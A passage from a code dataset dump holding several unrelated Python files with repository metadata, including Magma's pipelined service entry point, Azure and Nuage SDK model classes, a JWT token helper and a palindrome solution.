1c493d04d827f7eee6049ec2ce025df8bc70b4f9
| 7,100
|
py
|
Python
|
lte/gateway/python/magma/pipelined/main.py
|
ashish-acl/magma
|
d938f420b56b867a7c64101e6fac63f50be58a46
|
[
"BSD-3-Clause"
] | null | null | null |
lte/gateway/python/magma/pipelined/main.py
|
ashish-acl/magma
|
d938f420b56b867a7c64101e6fac63f50be58a46
|
[
"BSD-3-Clause"
] | 151
|
2020-09-03T20:44:13.000Z
|
2022-03-31T20:28:52.000Z
|
lte/gateway/python/magma/pipelined/main.py
|
ashish-acl/magma
|
d938f420b56b867a7c64101e6fac63f50be58a46
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: skip-file
# pylint does not play well with aioeventlet, as it uses asyncio.async which
# produces a parse error
import asyncio
import logging
import threading
import aioeventlet
from ryu import cfg
from ryu.base.app_manager import AppManager
from scapy.arch import get_if_hwaddr
from ryu.ofproto.ofproto_v1_4 import OFPP_LOCAL
from magma.common.misc_utils import call_process, get_ip_from_if
from magma.common.sentry import sentry_init
from magma.common.service import MagmaService
from magma.configuration import environment
from magma.pipelined.app import of_rest_server
from magma.pipelined.check_quota_server import run_flask
from magma.pipelined.service_manager import ServiceManager
from magma.pipelined.ifaces import monitor_ifaces
from magma.pipelined.rpc_servicer import PipelinedRpcServicer
from magma.pipelined.gtp_stats_collector import GTPStatsCollector, \
MIN_OVSDB_DUMP_POLLING_INTERVAL
from magma.pipelined.app.he import PROXY_PORT_NAME
from magma.pipelined.bridge_util import BridgeTools
from lte.protos.mconfig import mconfigs_pb2
def main():
"""
Loads the Ryu apps we want to run from the config file.
This should exit on keyboard interrupt.
"""
# Run asyncio loop in a greenthread so we can evaluate other eventlets
# TODO: Remove once Ryu migrates to asyncio
asyncio.set_event_loop_policy(aioeventlet.EventLoopPolicy())
service = MagmaService('pipelined', mconfigs_pb2.PipelineD())
# Optionally pipe errors to Sentry
sentry_init()
service_config = service.config
if environment.is_dev_mode():
of_rest_server.configure(service_config)
# Set Ryu config params
cfg.CONF.ofp_listen_host = "127.0.0.1"
# override mconfig using local config.
# TODO: move config compilation to separate module.
enable_nat = service.config.get('enable_nat', service.mconfig.nat_enabled)
service.config['enable_nat'] = enable_nat
logging.info("Nat: %s", enable_nat)
vlan_tag = service.config.get('sgi_management_iface_vlan',
service.mconfig.sgi_management_iface_vlan)
service.config['sgi_management_iface_vlan'] = vlan_tag
sgi_ip = service.config.get('sgi_management_iface_ip_addr',
service.mconfig.sgi_management_iface_ip_addr)
service.config['sgi_management_iface_ip_addr'] = sgi_ip
sgi_gateway_ip = service.config.get('sgi_management_iface_gw',
service.mconfig.sgi_management_iface_gw)
service.config['sgi_management_iface_gw'] = sgi_gateway_ip
if 'virtual_mac' not in service.config:
service.config['virtual_mac'] = get_if_hwaddr(service.config.get('bridge_name'))
# this is not read from yml file.
service.config['uplink_port'] = OFPP_LOCAL
uplink_port_name = service.config.get('ovs_uplink_port_name', None)
if enable_nat is False and uplink_port_name is not None:
service.config['uplink_port'] = BridgeTools.get_ofport(uplink_port_name)
# header enrichment related configuration.
service.config['proxy_port_name'] = PROXY_PORT_NAME
he_enabled_flag = False
if service.mconfig.he_config:
he_enabled_flag = service.mconfig.he_config.enable_header_enrichment
he_enabled = service.config.get('he_enabled', he_enabled_flag)
service.config['he_enabled'] = he_enabled
# monitoring related configuration
mtr_interface = service.config.get('mtr_interface', None)
if mtr_interface:
mtr_ip = get_ip_from_if(mtr_interface)
service.config['mtr_ip'] = mtr_ip
# Load the ryu apps
service_manager = ServiceManager(service)
service_manager.load()
def callback(returncode):
if returncode != 0:
logging.error(
"Failed to set MASQUERADE: %d", returncode
)
# TODO fix this hack for XWF
if enable_nat is True or service.config.get('setup_type') == 'XWF':
call_process('iptables -t nat -A POSTROUTING -o %s -j MASQUERADE'
% service.config['nat_iface'],
callback,
service.loop
)
service.loop.create_task(monitor_ifaces(
service.config['monitored_ifaces'],
service.loop),
)
manager = AppManager.get_instance()
# Add pipelined rpc servicer
pipelined_srv = PipelinedRpcServicer(
service.loop,
manager.applications.get('GYController', None),
manager.applications.get('EnforcementController', None),
manager.applications.get('EnforcementStatsController', None),
manager.applications.get('DPIController', None),
manager.applications.get('UEMacAddressController', None),
manager.applications.get('CheckQuotaController', None),
manager.applications.get('IPFIXController', None),
manager.applications.get('VlanLearnController', None),
manager.applications.get('TunnelLearnController', None),
manager.applications.get('Classifier', None),
manager.applications.get('InOutController', None),
manager.applications.get('NGServiceController', None),
service.config,
service_manager)
pipelined_srv.add_to_server(service.rpc_server)
if service.config['setup_type'] == 'CWF':
bridge_ip = service.config['bridge_ip_address']
has_quota_port = service.config['has_quota_port']
no_quota_port = service.config['no_quota_port']
def on_exit_server_thread():
service.StopService(None, None)
# For CWF start quota check servers
start_check_quota_server(run_flask, bridge_ip, has_quota_port, True,
on_exit_server_thread)
start_check_quota_server(run_flask, bridge_ip, no_quota_port, False,
on_exit_server_thread)
if service.config['setup_type'] == 'LTE':
polling_interval = service.config.get('ovs_gtp_stats_polling_interval',
MIN_OVSDB_DUMP_POLLING_INTERVAL)
collector = GTPStatsCollector(
polling_interval,
service.loop)
collector.start()
# Run the service loop
service.run()
# Cleanup the service
service.close()
def start_check_quota_server(target, ip, port, response, exit_callback):
""" Starts service server threads """
thread = threading.Thread(
target=target,
args=(ip, port, response, exit_callback))
thread.daemon = True
thread.start()
if __name__ == "__main__":
main()
| 37.172775
| 88
| 0.705775
|
import asyncio
import logging
import threading
import aioeventlet
from ryu import cfg
from ryu.base.app_manager import AppManager
from scapy.arch import get_if_hwaddr
from ryu.ofproto.ofproto_v1_4 import OFPP_LOCAL
from magma.common.misc_utils import call_process, get_ip_from_if
from magma.common.sentry import sentry_init
from magma.common.service import MagmaService
from magma.configuration import environment
from magma.pipelined.app import of_rest_server
from magma.pipelined.check_quota_server import run_flask
from magma.pipelined.service_manager import ServiceManager
from magma.pipelined.ifaces import monitor_ifaces
from magma.pipelined.rpc_servicer import PipelinedRpcServicer
from magma.pipelined.gtp_stats_collector import GTPStatsCollector, \
MIN_OVSDB_DUMP_POLLING_INTERVAL
from magma.pipelined.app.he import PROXY_PORT_NAME
from magma.pipelined.bridge_util import BridgeTools
from lte.protos.mconfig import mconfigs_pb2
def main():
asyncio.set_event_loop_policy(aioeventlet.EventLoopPolicy())
service = MagmaService('pipelined', mconfigs_pb2.PipelineD())
sentry_init()
service_config = service.config
if environment.is_dev_mode():
of_rest_server.configure(service_config)
cfg.CONF.ofp_listen_host = "127.0.0.1"
enable_nat = service.config.get('enable_nat', service.mconfig.nat_enabled)
service.config['enable_nat'] = enable_nat
logging.info("Nat: %s", enable_nat)
vlan_tag = service.config.get('sgi_management_iface_vlan',
service.mconfig.sgi_management_iface_vlan)
service.config['sgi_management_iface_vlan'] = vlan_tag
sgi_ip = service.config.get('sgi_management_iface_ip_addr',
service.mconfig.sgi_management_iface_ip_addr)
service.config['sgi_management_iface_ip_addr'] = sgi_ip
sgi_gateway_ip = service.config.get('sgi_management_iface_gw',
service.mconfig.sgi_management_iface_gw)
service.config['sgi_management_iface_gw'] = sgi_gateway_ip
if 'virtual_mac' not in service.config:
service.config['virtual_mac'] = get_if_hwaddr(service.config.get('bridge_name'))
service.config['uplink_port'] = OFPP_LOCAL
uplink_port_name = service.config.get('ovs_uplink_port_name', None)
if enable_nat is False and uplink_port_name is not None:
service.config['uplink_port'] = BridgeTools.get_ofport(uplink_port_name)
service.config['proxy_port_name'] = PROXY_PORT_NAME
he_enabled_flag = False
if service.mconfig.he_config:
he_enabled_flag = service.mconfig.he_config.enable_header_enrichment
he_enabled = service.config.get('he_enabled', he_enabled_flag)
service.config['he_enabled'] = he_enabled
mtr_interface = service.config.get('mtr_interface', None)
if mtr_interface:
mtr_ip = get_ip_from_if(mtr_interface)
service.config['mtr_ip'] = mtr_ip
service_manager = ServiceManager(service)
service_manager.load()
def callback(returncode):
if returncode != 0:
logging.error(
"Failed to set MASQUERADE: %d", returncode
)
if enable_nat is True or service.config.get('setup_type') == 'XWF':
call_process('iptables -t nat -A POSTROUTING -o %s -j MASQUERADE'
% service.config['nat_iface'],
callback,
service.loop
)
service.loop.create_task(monitor_ifaces(
service.config['monitored_ifaces'],
service.loop),
)
manager = AppManager.get_instance()
pipelined_srv = PipelinedRpcServicer(
service.loop,
manager.applications.get('GYController', None),
manager.applications.get('EnforcementController', None),
manager.applications.get('EnforcementStatsController', None),
manager.applications.get('DPIController', None),
manager.applications.get('UEMacAddressController', None),
manager.applications.get('CheckQuotaController', None),
manager.applications.get('IPFIXController', None),
manager.applications.get('VlanLearnController', None),
manager.applications.get('TunnelLearnController', None),
manager.applications.get('Classifier', None),
manager.applications.get('InOutController', None),
manager.applications.get('NGServiceController', None),
service.config,
service_manager)
pipelined_srv.add_to_server(service.rpc_server)
if service.config['setup_type'] == 'CWF':
bridge_ip = service.config['bridge_ip_address']
has_quota_port = service.config['has_quota_port']
no_quota_port = service.config['no_quota_port']
def on_exit_server_thread():
service.StopService(None, None)
start_check_quota_server(run_flask, bridge_ip, has_quota_port, True,
on_exit_server_thread)
start_check_quota_server(run_flask, bridge_ip, no_quota_port, False,
on_exit_server_thread)
if service.config['setup_type'] == 'LTE':
polling_interval = service.config.get('ovs_gtp_stats_polling_interval',
MIN_OVSDB_DUMP_POLLING_INTERVAL)
collector = GTPStatsCollector(
polling_interval,
service.loop)
collector.start()
service.run()
service.close()
def start_check_quota_server(target, ip, port, response, exit_callback):
thread = threading.Thread(
target=target,
args=(ip, port, response, exit_callback))
thread.daemon = True
thread.start()
if __name__ == "__main__":
main()
| true
| true
|
1c493e1bf2ed370836c63e29a5f7c2abab7be087
| 1,982
|
py
|
Python
|
azure/mgmt/network/v2016_09_01/models/vpn_client_configuration.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1
|
2022-01-25T22:52:58.000Z
|
2022-01-25T22:52:58.000Z
|
azure/mgmt/network/v2016_09_01/models/vpn_client_configuration.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
azure/mgmt/network/v2016_09_01/models/vpn_client_configuration.py
|
EnjoyLifeFund/Debian_py36_packages
|
1985d4c73fabd5f08f54b922e73a9306e09c77a5
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class VpnClientConfiguration(Model):
"""VpnClientConfiguration for P2S client.
:param vpn_client_address_pool: The reference of the address space
resource which represents Address space for P2S VpnClient.
:type vpn_client_address_pool:
~azure.mgmt.network.v2016_09_01.models.AddressSpace
:param vpn_client_root_certificates: VpnClientRootCertificate for virtual
network gateway.
:type vpn_client_root_certificates:
list[~azure.mgmt.network.v2016_09_01.models.VpnClientRootCertificate]
:param vpn_client_revoked_certificates: VpnClientRevokedCertificate for
Virtual network gateway.
:type vpn_client_revoked_certificates:
list[~azure.mgmt.network.v2016_09_01.models.VpnClientRevokedCertificate]
"""
_attribute_map = {
'vpn_client_address_pool': {'key': 'vpnClientAddressPool', 'type': 'AddressSpace'},
'vpn_client_root_certificates': {'key': 'vpnClientRootCertificates', 'type': '[VpnClientRootCertificate]'},
'vpn_client_revoked_certificates': {'key': 'vpnClientRevokedCertificates', 'type': '[VpnClientRevokedCertificate]'},
}
def __init__(self, vpn_client_address_pool=None, vpn_client_root_certificates=None, vpn_client_revoked_certificates=None):
self.vpn_client_address_pool = vpn_client_address_pool
self.vpn_client_root_certificates = vpn_client_root_certificates
self.vpn_client_revoked_certificates = vpn_client_revoked_certificates
| 47.190476
| 126
| 0.717962
|
from msrest.serialization import Model
class VpnClientConfiguration(Model):
_attribute_map = {
'vpn_client_address_pool': {'key': 'vpnClientAddressPool', 'type': 'AddressSpace'},
'vpn_client_root_certificates': {'key': 'vpnClientRootCertificates', 'type': '[VpnClientRootCertificate]'},
'vpn_client_revoked_certificates': {'key': 'vpnClientRevokedCertificates', 'type': '[VpnClientRevokedCertificate]'},
}
def __init__(self, vpn_client_address_pool=None, vpn_client_root_certificates=None, vpn_client_revoked_certificates=None):
self.vpn_client_address_pool = vpn_client_address_pool
self.vpn_client_root_certificates = vpn_client_root_certificates
self.vpn_client_revoked_certificates = vpn_client_revoked_certificates
| true
| true
|
1c493e8807b0e5346571eaaacbb826cbf365e77c
| 565
|
py
|
Python
|
tracker/user.py
|
k4t0mono/bridge-chat
|
49f70e270002b1cb91363b2a0b3acce2a56fee16
|
[
"BSD-2-Clause"
] | null | null | null |
tracker/user.py
|
k4t0mono/bridge-chat
|
49f70e270002b1cb91363b2a0b3acce2a56fee16
|
[
"BSD-2-Clause"
] | null | null | null |
tracker/user.py
|
k4t0mono/bridge-chat
|
49f70e270002b1cb91363b2a0b3acce2a56fee16
|
[
"BSD-2-Clause"
] | null | null | null |
import jwt
import time
import os
class User():
def __init__(self, login):
self.login = login
self.tokens = []
def gen_token(self):
end = int(str(time.time())[:-8]) + 86400
d = { 'login': self.login, 'type': 'auth', 'time': end }
t = jwt.encode(d, os.environ['BRIDGECHAT_SECRET'], algorithm='HS512')
t = t.decode('utf-8')
self.tokens.append(t)
return t
def __repr__(self):
s = '<User login=\'{}\' tokens={}>'.format(self.login, len(self.tokens))
return s
| 23.541667
| 80
| 0.534513
|
import jwt
import time
import os
class User():
def __init__(self, login):
self.login = login
self.tokens = []
def gen_token(self):
end = int(str(time.time())[:-8]) + 86400
d = { 'login': self.login, 'type': 'auth', 'time': end }
t = jwt.encode(d, os.environ['BRIDGECHAT_SECRET'], algorithm='HS512')
t = t.decode('utf-8')
self.tokens.append(t)
return t
def __repr__(self):
s = '<User login=\'{}\' tokens={}>'.format(self.login, len(self.tokens))
return s
| true
| true
|
1c493e966b7d54c69854c811b65ceb355625b0b4
| 347
|
py
|
Python
|
Python3/0009-Palindrome-Number/soln.py
|
wyaadarsh/LeetCode-Solutions
|
3719f5cb059eefd66b83eb8ae990652f4b7fd124
|
[
"MIT"
] | 5
|
2020-07-24T17:48:59.000Z
|
2020-12-21T05:56:00.000Z
|
Python3/0009-Palindrome-Number/soln.py
|
zhangyaqi1989/LeetCode-Solutions
|
2655a1ffc8678ad1de6c24295071308a18c5dc6e
|
[
"MIT"
] | null | null | null |
Python3/0009-Palindrome-Number/soln.py
|
zhangyaqi1989/LeetCode-Solutions
|
2655a1ffc8678ad1de6c24295071308a18c5dc6e
|
[
"MIT"
] | 2
|
2020-07-24T17:49:01.000Z
|
2020-08-31T19:57:35.000Z
|
class Solution:
def isPalindrome(self, x):
"""
:type x: int
:rtype: bool
"""
# solve it without converting the integer to a string
if x < 0:
return False
r = 0
origin = x
while x:
r = r * 10 + x % 10
x //= 10
return r == origin
| 23.133333
| 61
| 0.420749
|
class Solution:
def isPalindrome(self, x):
if x < 0:
return False
r = 0
origin = x
while x:
r = r * 10 + x % 10
x //= 10
return r == origin
| true
| true
|
1c493ee7f94ba470d37424f4171f5c35c2ec9d91
| 15,082
|
py
|
Python
|
vspk/v6/nufirewallacl.py
|
axxyhtrx/vspk-python
|
4495882c6bcbb1ef51b14b9f4dc7efe46476ff50
|
[
"BSD-3-Clause"
] | 19
|
2016-03-07T12:34:22.000Z
|
2020-06-11T11:09:02.000Z
|
vspk/v6/nufirewallacl.py
|
axxyhtrx/vspk-python
|
4495882c6bcbb1ef51b14b9f4dc7efe46476ff50
|
[
"BSD-3-Clause"
] | 40
|
2016-06-13T15:36:54.000Z
|
2020-11-10T18:14:43.000Z
|
vspk/v6/nufirewallacl.py
|
axxyhtrx/vspk-python
|
4495882c6bcbb1ef51b14b9f4dc7efe46476ff50
|
[
"BSD-3-Clause"
] | 15
|
2016-06-10T22:06:01.000Z
|
2020-12-15T18:37:42.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUFirewallRulesFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUDomainsFetcher
from bambou import NURESTObject
class NUFirewallAcl(NURESTObject):
""" Represents a FirewallAcl in the VSD
Notes:
None
"""
__rest_name__ = "firewallacl"
__resource_name__ = "firewallacls"
## Constants
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
def __init__(self, **kwargs):
""" Initializes a FirewallAcl instance
Notes:
You can specify all parameters while calling this methods.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> firewallacl = NUFirewallAcl(id=u'xxxx-xxx-xxx-xxx', name=u'FirewallAcl')
>>> firewallacl = NUFirewallAcl(data=my_dict)
"""
super(NUFirewallAcl, self).__init__()
# Read/Write Attributes
self._name = None
self._last_updated_by = None
self._last_updated_date = None
self._active = None
self._default_allow_ip = None
self._default_allow_non_ip = None
self._description = None
self._embedded_metadata = None
self._entity_scope = None
self._creation_date = None
self._rule_ids = None
self._auto_generate_priority = None
self._owner = None
self._external_id = None
self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="active", remote_name="active", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_ip", remote_name="defaultAllowIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_non_ip", remote_name="defaultAllowNonIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="rule_ids", remote_name="ruleIds", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="auto_generate_priority", remote_name="autoGeneratePriority", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
# Fetchers
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.firewall_rules = NUFirewallRulesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.domains = NUDomainsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def name(self):
""" Get name value.
Notes:
The name of the entity
"""
return self._name
@name.setter
def name(self, value):
""" Set name value.
Notes:
The name of the entity
"""
self._name = value
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def last_updated_date(self):
""" Get last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
""" Set last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
self._last_updated_date = value
@property
def active(self):
""" Get active value.
Notes:
If enabled, it means that this ACL or QOS entry is active
"""
return self._active
@active.setter
def active(self, value):
""" Set active value.
Notes:
If enabled, it means that this ACL or QOS entry is active
"""
self._active = value
@property
def default_allow_ip(self):
""" Get default_allow_ip value.
Notes:
If enabled a default ACL of Allow All is added as the last entry in thelist of ACL entries
This attribute is named `defaultAllowIP` in VSD API.
"""
return self._default_allow_ip
@default_allow_ip.setter
def default_allow_ip(self, value):
""" Set default_allow_ip value.
Notes:
If enabled a default ACL of Allow All is added as the last entry in thelist of ACL entries
This attribute is named `defaultAllowIP` in VSD API.
"""
self._default_allow_ip = value
@property
def default_allow_non_ip(self):
""" Get default_allow_non_ip value.
Notes:
If enabled, non ip traffic will be dropped
This attribute is named `defaultAllowNonIP` in VSD API.
"""
return self._default_allow_non_ip
@default_allow_non_ip.setter
def default_allow_non_ip(self, value):
""" Set default_allow_non_ip value.
Notes:
If enabled, non ip traffic will be dropped
This attribute is named `defaultAllowNonIP` in VSD API.
"""
self._default_allow_non_ip = value
@property
def description(self):
""" Get description value.
Notes:
A description of the entity
"""
return self._description
@description.setter
def description(self, value):
""" Set description value.
Notes:
A description of the entity
"""
self._description = value
@property
def embedded_metadata(self):
""" Get embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
""" Set embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
self._embedded_metadata = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def creation_date(self):
""" Get creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
return self._creation_date
@creation_date.setter
def creation_date(self, value):
""" Set creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
self._creation_date = value
@property
def rule_ids(self):
""" Get rule_ids value.
Notes:
Firewall rules associated with this firewall acl.
This attribute is named `ruleIds` in VSD API.
"""
return self._rule_ids
@rule_ids.setter
def rule_ids(self, value):
""" Set rule_ids value.
Notes:
Firewall rules associated with this firewall acl.
This attribute is named `ruleIds` in VSD API.
"""
self._rule_ids = value
@property
def auto_generate_priority(self):
""" Get auto_generate_priority value.
Notes:
If enabled, entries priority will be randomly generated between allowed range.
This attribute is named `autoGeneratePriority` in VSD API.
"""
return self._auto_generate_priority
@auto_generate_priority.setter
def auto_generate_priority(self, value):
""" Set auto_generate_priority value.
Notes:
If enabled, entries priority will be randomly generated between allowed range.
This attribute is named `autoGeneratePriority` in VSD API.
"""
self._auto_generate_priority = value
@property
def owner(self):
""" Get owner value.
Notes:
Identifies the user that has created this object.
"""
return self._owner
@owner.setter
def owner(self, value):
""" Set owner value.
Notes:
Identifies the user that has created this object.
"""
self._owner = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
| 30.164
| 296
| 0.604628
|
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUFirewallRulesFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUDomainsFetcher
from bambou import NURESTObject
class NUFirewallAcl(NURESTObject):
__rest_name__ = "firewallacl"
__resource_name__ = "firewallacls"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
def __init__(self, **kwargs):
super(NUFirewallAcl, self).__init__()
self._name = None
self._last_updated_by = None
self._last_updated_date = None
self._active = None
self._default_allow_ip = None
self._default_allow_non_ip = None
self._description = None
self._embedded_metadata = None
self._entity_scope = None
self._creation_date = None
self._rule_ids = None
self._auto_generate_priority = None
self._owner = None
self._external_id = None
self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="active", remote_name="active", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_ip", remote_name="defaultAllowIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="default_allow_non_ip", remote_name="defaultAllowNonIP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="rule_ids", remote_name="ruleIds", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="auto_generate_priority", remote_name="autoGeneratePriority", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.firewall_rules = NUFirewallRulesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.domains = NUDomainsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
@property
def name(self):
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def last_updated_by(self):
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
self._last_updated_by = value
@property
def last_updated_date(self):
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
self._last_updated_date = value
@property
def active(self):
return self._active
@active.setter
def active(self, value):
self._active = value
@property
def default_allow_ip(self):
return self._default_allow_ip
@default_allow_ip.setter
def default_allow_ip(self, value):
self._default_allow_ip = value
@property
def default_allow_non_ip(self):
return self._default_allow_non_ip
@default_allow_non_ip.setter
def default_allow_non_ip(self, value):
self._default_allow_non_ip = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def embedded_metadata(self):
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
self._embedded_metadata = value
@property
def entity_scope(self):
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
self._entity_scope = value
@property
def creation_date(self):
return self._creation_date
@creation_date.setter
def creation_date(self, value):
self._creation_date = value
@property
def rule_ids(self):
